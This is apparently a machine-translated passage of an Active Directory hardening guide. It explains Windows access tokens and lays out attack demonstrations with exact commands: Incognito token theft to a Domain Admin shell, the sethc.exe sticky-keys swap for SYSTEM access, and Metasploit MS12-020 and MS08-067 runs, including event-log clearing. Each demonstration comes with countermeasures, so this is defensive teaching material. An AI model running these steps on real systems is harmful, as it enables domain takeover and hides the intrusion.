To view the contents of a access token it is possible to use the tool token SZ downloadable at: http://www.microsoft.com/en-us/download/details.aspx?id=1448

The command below lists the SID the user account and SID groups to which they belong directly (or indirectly) and all its privileges.

tokensz.exe / compute_tokensize / dump_groups

Msreport - Guillaume MATHIEU - All rights reserved


If one is authenticated with the Kerberos protocol, the access token is generated using the field information CAP of TGT. Field CAP contains SID the
user account and all the groups the user belongs directly and indirectly.

The access token created during the interactive logon (the user enters his login / password) is called primary access token (Primary Access
token).
Each time a process is started by the user, a copy of token primary access is attached to this process. Whenever a process requires access
(NTFS permission) or privileges on the system, Windows will analyze the content of this token to validate whether or not the user has the right
to access the resource. To understand what an access token in more detail, I invite you to read the following Microsoft products:

http://blogs.technet.com/b/askds/archive/2007/11/02/what-s-in-a-token.aspx
http://technet.microsoft.com/en-us/library/cc759267 (v = ws.10) .aspx

Sometimes a process runs in the context of a user account A but needs to perform another task in the context of a user B. Each of these tasks
is called a
Thread. By default a thread uses the access token of the process said j andthe primary access (Primary Access Token). In this example the Primary
Access Token has the rights of the user A. If
thread needs to run in the context of a user B, it uses the functionality of Impersonation Token allowing the thread to run in the context of the user
account B.

Example of a file server (also applicable to a web server):


The service Server ( file sharing) runs in the context of the account System and manages access to file shares. When a user logs in to a file
server, service Server
will generate an access token in the context of the user account to control access to the user's resources.

To perform this impersonation, the file sharing service process must be privileged Impersonate a customer after-authentication (SeImpersonatePrivilege).

For more information about access tokens on impersonation:


http://blogs.technet.com/b/askds/archive/2008/01/11/what-s-in-a-token-part-2-impersonation.aspx http://technet.microsoft.com/en -us /
library / cc783557 (v = ws.10) .aspx

Msreport - Guillaume MATHIEU - All rights reserved


5.7 ELEVATION OF PRIVILEGE WITH THEFT OF ACCESS TOKEN

5.7.1 P RESENTATION TOOL INGOGNITO

Incognito The tool is available at the following address: http://sourceforge.net/projects/incognito/


Many antivirus detect it as a security threat. It will be necessary to install it on a machine with a virus whose real-time scanning is disabled.
Incognito is integrated in the Metasploit tool.

The tool INCOGNITO steals existing access tokens and uses them to perform tasks. It requires privileges SeDebugPrivilege,
SeAssignPrimaryTokenPrivilege, SeImpersonatePrivilege
to work. It must run as INCOGNITO System.

Incognito is able to run locally or remotely. Once started, it scans all processes that are running on the target machine and list all associated
access tokens to these processes.

INCOGNITO duplicates all access tokens and groups them by users. It is at this stage that the tool needs the privilege SeDebugPrivilege (Debug
programs) because this privilege allows it to open any process to access its memory and copy resources.

Once the list of obtained access tokens, the tool will be able to launch new process as another user using the access tokens that he copied.
The tool will be able to use the impersonation feature to use the access token associated with a process via the API

ImpersonateLoggedOnUser. This action requires the privilege SeImpersonatePrivilege (Impersonate a customer after-authentication). For more
information see:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
The tool will create a new process that associates with an access token (API usage
CreateProcessAsUser. This action requires the privilege SeAssignPrimaryTokenPrivilege (Replace a process-level token).

For more information :


http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito
http://blogs.technet.com/b/askds/archive/2008/01/11/what-s-in-a-token-part -2-impersonation.aspx

Msreport - Guillaume MATHIEU - All rights reserved


5.7.2 P ROCEDURE FOR USING THE TOOL INCOGNITO

To list all available tokens, open a command prompt with the account System. To do this, download the tool PSEXEC ( http://technet.microsoft.com/fr-fr/sysinternals/b
) And run the following command: Psexec.exe -i -d -s cmd

Once the command prompt run as user SYSTEM, type the following command:
incognito.exe -h localhost -u administrator -p P @ ssword list_tokens -u
Once we see access tokens, those marked Delegation can be stolen and used to launch a command prompt with the following command (it
steals msreport \ administrator token in this example is Domain Admins the qualification environment.

incognito.exe -h localhost -u administrator -p P @ ssword execute -c msreport \ administrator cmd


Enter the whoami command to validate the current user in the command prompt. To remove the process launched by
Incognito:
incognito.exe -h localhost cleanup

5.7.3 C OW BLOCK TOOL Incognito?

Avoid users to be local administrators on workstations. Configure the antivirus on all the company's machines to block executable

Metasploit and INCOGNITO .


Block the following Windows privileges through GPO for users who are directors of their station: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege,
SeImpersonatePrivilege

Msreport - Guillaume MATHIEU - All rights reserved


6 INDUSTRIALIZE AND SECURE THE DEPLOYMENT OF CONTROLLERS
DOMAIN
To ensure a high level of security for Active Directory, you must:
• Deploying domain controllers only with a supported version of Windows Server

• Reduce domain controllers attack surface.


• Deploy a standard configuration on all domain controllers.
• Have a deployment process (automated if possible) to the DCs.

6.1 DEPLOY ONLY ONE SUPPORTED VERSION OF WINDOWS SERVER

Microsoft typically supports an operating system for 10 years, including 5 years as standard (development of new functionalities) and 5 years
extended mode (bug fixes). When the OS is no longer supported, Microsoft no longer develops security patches and the system becomes
vulnerable to new discovered security vulnerabilities that are not corrected.

A critical security flaw in the SCHANNEL component has been discovered by Microsoft. It would allow an attacker to take control of a machine
on all Microsoft OS currently supported. Microsoft provides a patch for this vulnerability in the MS14-066 bulletin ( https://technet.microsoft.com/library/security/MS14-
).

Note that Microsoft does not provide information on this vulnerability nor fix for Windows 2000 Server. Domain controllers running Windows
2000 Server, however, are probably vulnerable to this flaw.

The Windows 2003 support ends July 14, 2015 as described on the Microsoft website
http://support2.microsoft.com/lifecycle/?LN=fr&C2=1163

For all these reasons, you should not have and deploy domain controllers with a version earlier than Windows 2008 R1.

Companies typically use machine models ( template) to deploy their physical servers and virtual servers. These models often integrate multiple
components / applications that are useless to a domain controller and increase the attack surface.

It is very important to avoid adding services that would execute in the context of the account System.
The latter has full administrative rights on the domain controller (including rights to all objects in the directory).

In some companies, the teams in charge of deploying servers may be different (different administration teams, outsourcing some sites).
deployment methodologies may therefore vary as configuring servers.

For all these reasons, it is recommended to deploy domain controllers with an image (template) managed by Active Directory
Management team.

Msreport - Guillaume MATHIEU - All rights reserved


6.2 HOST DOMAIN CONTROLLERS IN A SECURE LOCATION

6.2.1 Q WHAT ARE THE RISKS IF AN ATTACKING A PHYSICAL ACCESS CONTROLLER


FIELD?

As explained in the Microsoft article http://blogs.technet.com/b/rhalbheer/archive/2011/06/16/tenimmutable-laws-of-security-version-2-0.aspx If


an attacker has unrestricted physical access to your server, it's not your server. The following demonstration illustrates this.

Start your domain controller on a DVD installation of Windows 2008 R2 or Windows 2012 R2. Select the option Repair your computer .

Select then Troubleshoot then Command prompt .

The C drive of the server appears as the D drive Type the following commands in the
command prompt.
move d: \ Windows \ System32 \ sethc.exe d: \ Windows \ System32 \ sethc.old copy d: \ Windows \
System32 \ cmd.exe d: \ Windows \ System32 \ sethc.exe
Then restart the server.

Upon restart, press the button 5 times Shift.


The command prompt launches as System. Type DSA.MSC.

Msreport - Guillaume MATHIEU - All rights reserved


SYSTEM account has full control over the object.

can now reset the password for the domain administrator account (member groups Domain admins and Enterprise admins ) because the

Msreport - Guillaume MATHIEU - All rights reserved Console Active Directory Users and Computers appears. Show console Advanced features . You
mode Native 2012 R2.
This technique allows to have full access to the directory and all its accounts. This is the first step before a more dangerous attack will be to
recover the passwords of the users reported from NTHASH or LMHash.

To ensure the security of your directory, so you must prevent a user can start your domain controller from a parallel OS (LiveCD) and
modify files and Windows Server registry.

Msreport - Guillaume MATHIEU - All rights reserved In the example above, the forest msreport.be is
6.2.2 C OW TO PREVENT AN ATTACKING OF GO TO FILE NTDS.DIT?

Microsoft supports the deployment of domain controllers on physical servers and virtual machines. Microsoft's official support is done through
the SVVP ( Windows Server Virtualization Validation Program). I invite you for it to consult the following website:

http://www.windowsservercatalog.com/svvp.aspx
So we have to deal with the protection of physical domain controllers and virtual domain controllers.

The first step is of course to protect the server room against unauthorized access. The physical domain controllers must be hosted in a secure
server room. However, this technique does not apply to virtual domain controllers. Indeed, the hard drives of virtual machines have VHD files
(with Hyper-V), VMDK (VMware) that can be copied when the virtual machine is on or off.

The table below shows the cons-measures applicable to the controllers of physical and virtual domain.

Countermeasure Note

Hosting the domain controller in a This measure-cons apply for physical servers. You must disable the BIOS boot on a DVD / USB
secure data center. which is not always possible.

BitLocker uses the TPM. This solution works for controllers physical realm but does not work for
virtual machines. Indeed the latter are not able to emulate a TPM. We will have to use a password
Encrypting the hard disk with
to enter at startup.
BitLocker

If you can not host the domain controllers in a secure room and that the risk of machine theft is
very important, to deploy an RODC (Domain RODC) is required. This type of domain controller
stores no default password. You can set up accounts for which passwords are cached on the
RODC. If the domain controller compromise, you need only change the passwords of those user
accounts. To function properly, you must have a Windows 2008 domain controller read / write in
at least one Active Directory site. The update http://www.microsoft.com/enus/download/details.aspx?id=7707
must be deployed
Deploy RODC

the
Machines Windows XP / 2003 to enable the proper functioning of authentication with RODC.

The procedure to enable BitLocker on domain controllers (physical server and virtual machine) is presented in appendix in this document.

Msreport - Guillaume MATHIEU - All rights reserved


6.3 DEPLOY THE SECURITIES ADJUSTMENTS ON FIELD CONTROLLERS

6.3.1 P WHY IS IT NECESSARY TO DEPLOY THE SECURITY PATCHES?

Security breaches are defects in the programming that enable an attacker to hijack the traditional operation of this software in order to get
access to the system or interrupting its operation (software crash).

Security breaches are often linked to defects in the interpretation of the parameters passed to the program. This software is written to receive a
variable of type INTEGER (integer) parameter receives a variable FLOAT ( float number) and then stops working.

Deploying an antivirus will not protect you against the exploitation of security vulnerabilities (exploits) by an attacker. It eventually will detect the
use of a known program exploiting the security flaw (as Incognito, Metasploit ...).

Today it is very easy to download internet tools like Metasploit incorporating thousands of exploits that target key software solutions used by
companies.

The solution Metasploit offers through a console or a GUI to launch sophisticated attacks against Active Directory domain controllers. It allows
for example via the security hole MS08-67 to take control of a Windows 2003 domain controller or via the security hole MS012-020 to crash (blue
screen) server on Windows 2008 R2.

I invite you to read the articles that are the most critical flaws to exploit and news outlets of new exploits.

https://community.rapid7.com/community/metasploit/blog/2012/12/11/exploit-trends-new-exploitsmake-the-top-10

https://community.rapid7.com/community/metasploit/blog
You can download Metasploit at this address :
http://www.rapid7.com/products/metasploit/download.jsp .

Metasploit integrates an exploit based on the fault MS12_020 that crashes a Windows 2008 R2 server not updated. One step to complete is not
available at this location:
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids
In one isolated network environment , installing a virtual machine Windows 2008 R2 (outdated) and activate Remote office. Get the IP of this
machine. In the console Metasploit type the following commands:

Use auxiliary / dos / windows / rdp / ms12_020_maxchannelids Set RHOST


server_ip Run

Msreport - Guillaume MATHIEU - All rights reserved


Msreport - Guillaume MATHIEU - All rights reserved
Metasploit includes an exploit based on the vulnerability CVE-2008-4250 / MS08-067 which provides a SYSTEM command prompt. A stepper is
available on the site:
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

In the Metasploit console, type the following commands:


use exploit / windows / smb / ms08_067_netapi feat

You then get a command prompt with SYSTEM rights

The service Server ( file sharing) plant on the target machine. Type ? for a list of commands and getsystem to get admin rights,

clearenv to purge the event observers. Type getpid for the PID of METADSPLOIT process on the target machine. Confirm with Task Manager of
the attacked machine if process exists (see PID column).

Type the command ps to list the processes on the target machine. Stop the process using the command kill PID-number

You should always update the domain controllers (every month). Indeed installation linked the risk of failure of a patch is much less than
the risk of default in case of attack or infection by a virus / worms exploiting a security hole .

Msreport - Guillaume MATHIEU - All rights reserved


6.3.2 I INSTALLING SECURITY PATCHES ON FIELD CONTROLLERS

Today there are many free solutions ( WSUS, Windows Update) or paid ( Landesk Management Suite Dell Kace, System Center Configuration
Manager (SCCM) ...) that can support the deployment of security patches.

Companies usually have a patch deployment solution but rarely control patches are actually deployed on the machines. However, many factors
can block the deployment of patches. Administrators can forget approve an essential fix. The fix may refuse to install if the deposit WMI is corrupt
because the patch launches a request WMI for detecting patches already installed ( http://msreport.free.fr/?p=459) . An addiction to install the
hotfix may also be missing. It is therefore recommended to use a third party tool such as MBSA (other than your deployment tool) to confirm
that your domain controllers are current.

The deployment of security patches can sometimes generate failures / malfunctions. Microsoft has conducted numerous studies have shown
that not upgraded systems encountered more outages / failures that day systems. Microsoft releases security patches on the second Tuesday
of the month (US time). Breakdowns are usually detected after 2 to 3 days and a version 2 patch is then provided by Microsoft or the patch is
removed. To reduce the risk of negative impact of a fix, you can deploy patches on pilot domain controllers in the second Thursday of each
month and deploy patches on all other domain controllers on the third Tuesday of each month ( a week after the release of the security patch).

The customer Automatic Update Windows tries to reboot automatically when the hotfix installation is complete. This behavior may be a problem
with the production servers. He did not used to set the exact time that the patches should be installed and the exact time of the restart. It has
reduced functionality on servers

Windows 2008 R1 and Windows 2008 R2 installed mode Core. You can use a tool like WuInstall and create with this tool Scheduled Tasks for
deploying patches
domain controllers. WuInstall can be downloaded at:
https://www.wuinstall.com .

6.4 REDUCE THE ATTACK DOMAIN CONTROLLERS SURFACE

To reduce the attack surface, it is necessary to deploy only the Windows roles and features (Server Manager) required on a domain controller.
A domain controller requires that the role Active Directory Domain Services and role (DNS unless DNS is managed by a third solution). On
Windows 2012 R1 and later, the GUI is available as a 2 optional features. The below commands show how to deploy the GUI on a server Core
fashion:

Import-Module ServerManager Mkdir c: \


MountDir
Get-WindowsImage -ImagePath D: \ sources \ install.wim
Mount WindowsImage -ImagePath d: \ sources \ install.wim -Path C: \ mountdir -Index 4 -readonly Install-WindowsFeature
Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart -Source c: \ mountdir \ Windows \ Winsxs

In fashion Core ( Server-Gui-Mgmt-Infra and Server-Gui-Shell not installed), it is possible to administer the server with PowerShell locally or
remotely (from another server) with consoles
MMC, the Server Manager or PowerShell.
One of the disadvantages of the Core mode is difficult to see the event viewers locally (with the PowerShell command Get-Eventlog). The
analysis of events remotely observers is not always possible if the line is too slow or if network access is cut.

Since Windows 2012 R1, it is possible to deploy the server mode minimal interface
(functionality Server-Gui-Mgmt-Infra installed). This mode allows to perform all MMC consoles but without a GUI.

Msreport - Guillaume MATHIEU - All rights reserved


It is therefore recommended to deploy domain controllers running Windows 2012 or later R1 mode minimal interface and deploy only
those machines roles Active Directory Domain Services and DNS.

6.5 NEVER STOP SERVICE WINDOWS FIREWALL

Since Windows Vista / Windows 2008 R1, the Windows Firewall is enabled by default. This firewall integrates many features as explained in the
article http://technet.microsoft.com/enus/library/cc753180.aspx . The Windows Firewall is a stateful firewall. It stores the state of all TCP and UDP
connections and can dynamically create rules to allow traffic inbound / outbound legitimate (eg the response to an HTTP request (code of the
web page) returned by the web server to server ).

The Windows Firewall allows you to create rules to filter incoming and outgoing traffic based on a program (allow any of this Application traffic
...), port or IP. It also includes a set of predefined rules that allow the proper operation of Windows roles and features deployed on the server.

When a server becomes a domain controller (after deployment of the role Active Directory Domain Services, the predefined rule in the Windows
Firewall Active Directory Domain Services is activated. Inbound and outbound rules below are then activated.

Msreport - Guillaume MATHIEU - All rights reserved


An application developed for Windows 2008 / Vista and later can automatically create and activate rules in the Windows Firewall if needed (for
the smooth operation of the program). It is relatively rare to have to create a rule manually.

The Windows Firewall has 3 profiles for connections Public, Private, and Domain. Specific rules may apply only to a profile. If you're working
group, the firewall will ask you to start if you want to apply the rules of the firewall profile Public

or Private. If you are a member of an Active Directory domain, you must apply the rules of profile Domain if you are connected to the corporate
network (otherwise, the system asks if you want to be in profile Public or Private). This mode allows you to create rules that apply only when the
user is working from home or from a public Internet connection.

The Windows firewall can be managed from the control panel ( Control Panel | Windows Firewall) or via the console Windows Firewall with
Advanced Security. Always configure the firewall from the console Windows Firewall with Advanced Security !

Indeed on Windows 2008 R1, the system offered only to disable the firewall for the current profile. When deploying Windows 2008 R1,
administrators often they disabled the firewall from the control panel when the machine was still working group. They therefore they disabled the
firewall profile Public or Private. When the server was joined to the domain, the firewall happening in profile Domain and then active again. This
interface problem was corrected with Windows 7 / Windows 2008 R2.

If you want to disable the firewall on a Windows Server 2008 (and later) you must not stop the Windows Firewall Service . This is not
supported by Microsoft and blocks the following features: the ability to encapsulate traffic in frames IPSEC and Windows Service Hardening. To
stop the firewall, configure profiles Public, Private and Domain on condition

Off.

Msreport - Guillaume MATHIEU - All rights reserved


workstations!

Windows Service Hardening helps protect Windows services that run in the user account context with high privileges. This feature is explained in
detail in the articles below and in the "L has access management with Active Directory " This document:

http://blogs.technet.com/b/askperf/archive/2008/02/03/ws2008-windows-service-hardening.aspx
http://blogs.msdn.com/b/sql_protocols/archive/2009/09
/21/connection-from-a-windows-service-couldbe-blocked-by-firewall-even-if-firewall-is-disabled.aspx

The UAC 6.6 SET

The UAC under Windows is a set of security components which allows among others:

Protect certain files and registry location:


It is for example possible to create a file in the root of drive C. The administrator no longer has access to certain files and displays the following
message to: You do not Currently-have permission to access this folder. Click Permanently continues to get access to this folder. This can
cause problems if the administrator clicks on the button keep on going because the permissions on the folder are modified to give access to the
user account. This problem is explained in the Microsoft article: http://support.microsoft.com/kb/950934/en-us

Msreport - Guillaume MATHIEU - All rights reserved This is also true for Windows
Generate two access tokens:
An access token with all privileges and user's SID is generated. A second token is generated with reduced rights (suppression of groups like
SID Administrators). The user can use his unfiltered token only after high (confirmation window or the user has executed the application as
administrator).

To enable Protected Mode Internet Explorer:


The UAC should be enabled for Protected Mode Internet Explorer is active. This ensures that no ActiveX script (or other scripts that run in
Internet Explorer) may make a change to the system.

By default, UAC is disabled for the account Administrator ( account created by default Windows) and enabled for all other user accounts. It can
only be disabled by group (GPO) for other users who are administrators of the machine.

Msreport - Guillaume MATHIEU - All rights reserved


Settings,
UAC is not completely disabled in Windows. If you try to stop a service from the command prompt, you'll get a message Access is denied.

The UAC is disabled based on a deployed mode server Core and reduced interface ( no graphical interface).

Article Microsoft http://support.microsoft.com/kb/2526083 explains that UAC can be deactivated on a machine where only administrators can
connect. So you could disable UAC on domain controllers. Personally, I prefer to keep UAC but the 2 following settings are acceptable for
domain controllers:

• Completely disable UAC: this also disables Protected Mode Internet Explorer.
• Disable partially UAC (equivalent to the level 1 of AUC in Control Panel | Users Accounts | Change User Account Control Settings).

Tips for Working on a Windows 2012 R2 machine with active UAC.


Start a command prompt PowerShell as administrator. Then start all programs as regedt32 since PowerShell command prompt. This trick
unfortunately does not work for Windows Explorer.

To launch the Explorer as an administrator must use another trick described on this website:
https://social.technet.microsoft.com/Forums/windows/en-US/1798a1a7-bd2e-4e42-8e980bc715e7f641/unable-to-open-an-elevated-windows-explorer-window

Launch the task manager. Finish the explorer.exe process. Then start Explorer.exe cohant box Create this task with administrative
privileges.

Msreport - Guillaume MATHIEU - All rights reserved If you disable UAC via Control Panel | Users Accounts | Change User Account Control
It works. We unrestricted explorer. More may alter the permissions.

6.7 DISABLE CACHING OFFLINE SESSIONS

When a user logs in, the login / password is cached on the machine HKEY_LOCAL_MACHINE \ SECURITY \ CACHE. By default, only the
account System has the rights to view the content of this key. This allows for example a user with a laptop computer from logging in when it is
not connected to the corporate network. This mode of operation is not applicable to servers and fixed workstations. For this reason and for
security reasons, I invite you to disable caching sessions for all machines except desktops.

Msreport - Guillaume MATHIEU - All rights reserved


The following article explains how to retrieve the password cache Windows 2000 / XP.
http://www.passcape.com/domain_cached_passwords

To disable caching of user logons via GPO, you must define the following parameters:

6.8 STRENGTHENING SECURITY REMOTE OFFICE

I invite you to read the following documentation https://www.sstic.org/media/SSTIC2012/SSTICactes/securite_rdp/SSTIC2012-Article-securite_rdp-ebalard_bordes_rig


which explains in detail how the RDP protocol and how to configure securely. The following recommendations are taken from this guide and a
Microsoft document that lists the security best practices for Active Directory (available here http://aka.ms/bpsad).

6.8.1 U SING OF WORK STATIONS ADMINISTRATION

Whenever possible, you should minimize the direct connections in Remote Desktop (TSE) on the domain controllers. The administration of the
Active Directory must be from administrative machinery on Windows 2008 R1 or later. These devices must only Active Directory administrative
tools such as Active Directory Users and Computers, Active Directory Administrative Center and the Active Directory module for PowerShell. Internet
access on the administrative machinery must be restricted (banned if possible). These machines must be housed in secure facilities to protect
against theft. Reminder attacks like Pass The NTLM Hash or with a tool such as INCOGNITO

could allow a user with administration stolen machine to perform elevation of privilege (recover access user accounts with privileges to Active
Directory). For the same reason, it is not recommended to administer Active Directory from standard non-secure workstations. For this, you
need to restrict the machines on which the user accounts with administrative privileges can log on.

Msreport - Guillaume MATHIEU - All rights reserved


You can also block access via the network to all machines (other than administrative stations and domain controllers) for Active Directory
administrative accounts. This can be implemented with the GPO setting Deny Access to this computer from the network.

6.8.2 C Iles SERVICE B FFICE REMOTE

If you have administrative machines running Windows 2003 Server:


Whenever possible, migrate to Windows 2008 R2 or later. If this is not possible, you must deploy the service pack 1 (Service Pack 2
recommended) on the machine Windows 2003, generate a computer certificate from an external certification authority or a Microsoft Certificate
Authority business (see procedure deployment schedule) and then apply the recommendations of the following article: http://support.microsoft.com/kb/895433/en-us

If you have administrative machine servers under Windows 2008 or later:

The RDP access is via TLS. However, these machines have a self-signed certificate. You must generate a computer certificate for each
administration machine with an external certification authority or a Microsoft Enterprise certification authority (see deployment procedure in
appendix).

Then you configure the Remote Desktop with the correct settings. This can be done in the Remote tab Control Panel | System.

Check the boxes Allow remote connections to this computer and Allow only connections from computers running Remote Desktop with Network
administrative privileges on the directory.
Level Authentication.

values. An alternative to this method is to configure the GPO setting Deny logon locally a user group whose members are all user accounts with

box The Following computers. Enter the list of machines on which the user can open the session. The underlying attribute manages up to 1024

Msreport - Guillaume MATHIEU - All rights reserved Go to the properties of the user account tab Account then click on Log on To and check the
You can also configure the RDP service for not map printers within TSE sessions ( Computer Configuration | Policies | Administrative Templates
| Windows Components | Remote Desktop Services | Remote Desktop Session Host | Printer Redirection).

You have to get the configuration below.

NLA.

Desktop Services | Remote Desktop Session Host | Security. Set GPO settings as follows to configure RDP over SSL access with authentication

GPO called Administrative-computers. Go in Computer Configuration | Policies | Administrative Templates | Windows Components | Remote
6.8.3 A UTORISER ONLY TOOLS ADMINISTRATION

You can greatly increase the safety of the directory strengthening security administrative workstations. You can indeed activate AppLocker these
workstations to allow only the administrative tools required by administrators.

AppLocker will for example to prevent the execution of a third party browser or even Internet Explorer. I invite you to read this document outlining
how to secure servers Remote Desktop Services with AppLocker. In it, the basic rules AppLocker authorizing all executables in C: \ Windows is
event logs). For this, move the computer accounts of the administrative machinery in a separate OR. Start GPMC and create and link a new
deleted. Only binaries required to start a Remote Desktop session and the administrative tools are allowed:

http://msreport.free.fr/articles/Securisation_RDS_2008_R2_V.1.0.1.pdf

AppLocker requires workstations on Windows 7 Enterprise / Ultimate (or later) or Windows Server 2008 R2 (or later).

We must therefore set up the server by GPO. This will thus allow you to disable printer mapping (which usually generates many errors in the

If your management stations are Windows 2003 Server, you can use software restriction policies: http://msreport.free.fr/?p=202

Msreport - Guillaume MATHIEU - All rights reserved Console Remote Desktop Session Host Configuration does not exist in Windows 2012 R2!
6.8.4 C Iles CUSTOMER B FFICE REMOTE

You must deploy the RDP client 7.0 (minimum) on all Windows Vista workstations or later. There is a procedure to enable NLA authentication
with Windows XP SP3 ( http://support.microsoft.com/kb/951608/en-us ) But the use of this system is strongly discouraged (over security patch
since April 2014).

At the Remote Desktop client, go to the tab Advanced then select Do not connect
for the field If server authentication fails. This parameter can be set at the GPO setting Configure server authentication for customer under Computer
Configuration | Policies | Administrative Templates | Windows Components | Remote Desktop Services.

If the connection attempt from a workgroup machine (which does not recognize the certificate as trusted), an error message appears.

6.8.5 U SING THE FUNCTIONALITY " RESTRICTED A DMIN "

This is a new Remote Desktop feature that helps to fight against such attacks Pass The NTLM hash. This new feature lets have administrator
access only on the local machine. If access to another machine, one has only the computer account permissions on the server where it is
logged. this feature

Msreport - Guillaume MATHIEU - All rights reserved


was initially available for Windows 8.1 / Windows 2012 R2. It is now available on Windows 7 / Windows 2008 R2 after installing the following
patch:
http://support.microsoft.com/kb/2984972

To connect to Remote Desktop mode restrictedAdmin, the command:


mstsc / restrictedadmin
Log on as a domain administrator.
If you try to connect to a remote server for the RDP session, there was a message Access is denied. For more information : http://blogs.technet.com/b/kfalde/archive/

Msreport - Guillaume MATHIEU - All rights reserved


6.9 RESTRICT INTERNET ACCESS FROM THE FIELD OF CONTROLLERS

Two solutions are possible for Internet access domain controllers:

Configure domain controllers to not have any Internet access:


This solution requires to uncheck the boxes Check for publisher's certificate revocation, Check for server certificate revocation and Check for
signing is downloaded programs. Otherwise, you may experience failures or delays when installing some third-party programs or security
patches. It will also be necessary to configure the DNS servers on domain controllers to use other DNS servers (forwarders) to resolve external
DNS names. The NTP server used at the root domain controller with the PDC Emulator role will be an internal server.

Configure domain controllers to have limited access to the Internet (DNS, HTTP and HTTPS, NTP)

This configuration is simpler to implement. To avoid compromising security, I invite you however to leave the active UAC to have Internet
Explorer in protected mode.

At the configuration of enhanced Internet Explorer security


This device allows to curb dramatically the internet and request multiple confirmations when accessing a standard website. The frequency of
POPUP is very problematic because it pushes the directors to confirm the message without reading it. For this reason, I prefer personally
disable this feature.

Msreport - Guillaume MATHIEU - All rights reserved


6.10 SETTING THE PASSWORD DSRM

The DSRM password is required during the Active Directory restore operations. This password is very critical and must meet the following
requirements:
• Being known by the Active Directory service management team.
• Being stored in a secure location.
• If possible be different for each domain controller.
• Contain at least 24 characters.

This password is set when promoting a domain controller. It is possible to use the tool
Ntdsutil to change the password DSRM later.

DEPLOY 6.11 CONFIGURATION STANDARD ON ALL AREA CONTROLLERS

6.11.1 C iles IPV6

By default since Windows 2008 R1, IPV6 has priority over the IPv4 protocol. When you do a ping localhost this is the address :: 1 which responds
by not 127.0.0.1. Microsoft recommends not disable IPv6 completely but configuring IPv4 as preferred protocol. Launch

basic editor register and set the registry entry


DisabledComponents (REG_DWORD) to 32 (decimal) in HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TCPIP6 \
Parameters.

Msreport - Guillaume MATHIEU - All rights reserved


It is also possible to deploy this registry entry with a preference GPO.

For more information : https://support.microsoft.com/kb/929852/en-us

6.11.2 D EPLOYER A VIRUS UPDATE AND DISCLAIMERS SET

Antivirus for the operating system must be deployed to domain controllers. This must however be configured to exclude from scanning files /
folders indicated in the Microsoft article http://support.microsoft.com/kb/822158/en-us as the files of the Active Directory database or directory SYSVOL.

Msreport - Guillaume MATHIEU - All rights reserved


6.11.3 U SING THE SETUP WIZARD OF SECURITY

Since Windows 2003 Server SP1, Microsoft offers a wizard to strengthen the security of servers. In Windows 2012 R2, this wizard is available
at the Server Manager in the menu Tasks.

The wizard uses a configuration based on the roles deployed on the machine model. This tool will automatically detect the configuration of the
machine (a domain / DNS server controller in our case) and will provide an ideal configuration based on the services on the machine. The
implementation of this solution presupposes that the roles deployed on the servers do not change over time. You can not deploy a new
role on your servers if they are configured with this wizard without providing a reconfiguration phase.

The wizard Security Configuration Wizard and its control line equivalent scwcmd
allow:
• Create a model configuration (generation of an XML file).
• To analyze if a machine conforms to a model configuration.
• To apply a configuration template to a machine.
• Delete a model configuration applied to a machine.
• Convert a configuration (XML) in a GPO using the following command:
scwcmd transform /p:"C:WindowssecuritymsscwPoliciestest.xml "/ g," Server Security "

The tool analyzes the roles on the server and will propose:
• Disable unnecessary services on the server.
• Configure required exceptions in the Windows firewall.
• Configure the security settings of the machine.

Msreport - Guillaume MATHIEU - All rights reserved


Msreport - Guillaume MATHIEU - All rights reserved
To configure the security rules, the tool asks questions about the type of clients and offers a secure configuration. In the example below, the
parameters of production in the directory are more secure than those offered by the tool. Only the NTLM authentication protocol V2 is allowed in
the directory while the tool proposes to allow NTLM V1 and V2. A critical look is needed on the configuration offered by the tool.

The following site provides some experience feedback on enhanced security of Windows clusters. The conclusion is clear. use Security
Configuration Wizard provides a secure and functional configuration.

http://blogs.technet.com/b/mspfe/archive/2014/05/29/why-you-should-avoid-manual-serverhardening.aspx

For more information :


http://technet.microsoft.com/en-us/security/jj720323.aspx
http://www.petri.com/protect-windows-server-using-the-security-configuration-wizard-part-2-applyingand-rolling-back-policies-and-advanced-features.htm
http: // technet .Microsoft.com / en-us / library / ff807358.aspx

Msreport - Guillaume MATHIEU - All rights reserved


6.11.4 T ESTER YOUR PICTURE IN A QUALIFICATION ENVIRONMENT

To test the domain controller deployment image it is necessary to deploy a model of environmental copy of the production environment.

6.11.4.1 Requirements (this may vary depending on your environment)

A server with 8 GB of memory, a 128GB solid state drive.


A domain controller hosted on a virtual machine. It will be necessary to deploy the same virtualization solution on the qualifying server on the
production environment (VMware ESX 5.5, Hyper-V ...). VMware ESX 5.5 Note that disables caching of disks where the requirement to use an
SSD to maintain proper performance and that it recognizes that some network cards (Intel E1000 among others).

If you have that physical domain controllers, I invite you to deploy a temporary domain controller on a virtual machine (by area). Avoid P2V as
this may generate USN rollback as explained in this article: http://support.microsoft.com/kb/875495/en-us .

6.11.4.2 Step 1: virtualizing a domain controller per domain (such as with a forest containing 2 fields):

Stop a domain controller in each domain and copy these two domain controllers by copying the files to the virtual machine (VM) corresponding
to the test server. We must stop the two domain controllers at the same time! Warning, this can have impact on applications such as Exchange
because this solution relies on some domain controllers ( DS Access). This is even more problematic if DS ACCESS were forced. For more
information, I invite you to read this article http://support.microsoft.com/kb/910999 .

When copying two domain controllers (one for the root domain and one for the child domain) is complete, restart the production domain
controllers (the original version). Especially do not start copying the 2 two domain controllers (VMs) at that time.

Configure virtual machines replicated to start in an isolated network environment .


For people under VMware ESX, create a new vSwitch. You should not assign physical network card. Map the network card of the two virtual
machines in this vSwitch. With Hyper-V / XenServer, create an internal network and configure the network card of the two virtual machines in
the internal network. It is important not to virtual machines of the test environment can communicate with the production environment. If
this happens, you will generate very serious replication conflicts. To avoid this problem (in case of error virtualization solution configuration),
change the IP address of the domain controllers to use an unused range and not routed to your production network.

Duplicate domain controller should preferably be a DNS server if you want to retrieve the DNS zones. Reminder DNS zones hosted in ForestDnsZones
and in the
DomainDnsZones are replicated on domain controllers that are DNS servers.

6.11.4.3 Step 2: Cleaning of the directory

We must remove the domain controllers that have not been copied. Transfer (forced mode) if necessary FSMO roles. It is as if you had done a DCPROMO
